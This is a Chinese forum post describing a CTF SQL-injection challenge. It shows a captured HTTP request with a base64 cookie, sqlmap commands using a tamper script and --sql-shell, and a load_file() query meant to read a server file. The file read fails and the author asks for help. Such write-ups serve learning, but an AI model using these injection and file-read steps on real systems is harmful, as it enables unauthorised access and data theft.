[CTF知识] 打谱CTF Simple-Sqli 过程受阻

[复制链接]
查看770 | 回复1 | 2019-10-11 14:53:34 | 显示全部楼层 |阅读模式
001.png 根据hint(提示),进入提示页,提示:flag在secret.php中。于是想到是利用sql注入读取文件。
于是,就是寻找注入点。在注册新用户后,登录
002.png
抓包,发现cookie中的uname大概存在注入点。
  1. GET /sqli/index.php HTTP/1.1
  2. Host: 62.234.99.204:8006
  3. Cache-Control: max-age=0
  4. Upgrade-Insecure-Requests: 1
  5. User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36
  6. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
  7. Referer: http://62.234.99.204:8006/sqli/
  8. Accept-Language: zh-CN,zh;q=0.9
  9. Cookie: uname=eGg%3D; PHPSESSID=h0eve6045aqd25l250alfhu4m6
  10. Connection: close
复制代码
于是用sqlmap跑一遍,刚开始没跑出来,结果发现uname是经过base64和url编码的。于是在sqlmap中加入tamper跑,终于跑出来了。
  1. <div class="blockcode"><blockquote>sqlmap -r 1.txt --level 3 --tamper=base64encode -p uname -v 3
复制代码


中途爆库,虽然能够爆出数据来,但是没有我们要的flag。一开始我们的目的也是利用sql注入读文件,于是想到了拿sql-shell。搞起
  1. sqlmap -r 1.txt --level 3 --tamper=base64encode -p uname -v 3 --sql-shell
复制代码
成功进入sql-shell。一阵开心,但是,但是,要读取的文件路径在哪,在哪,在哪?没办法,找吧
003.png
在注册页面发现路径,为了更加确认,我又发现系统可以访问phpinfo.php,上面提示的路径也是如此。接下来,就开始读取secret.php文件
  1. select load_file('/www/wwwroot/axbweb6.com/sqli/secret.php')
复制代码
但是结果却是空,到底是为什么,求助。

004.png
回复

使用道具 举报

leozhang81 | 2019-10-14 23:55:02 | 显示全部楼层
学习一下
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

1

主题

3

帖子

21

积分

打谱CTF

Rank: 3Rank: 3

积分
21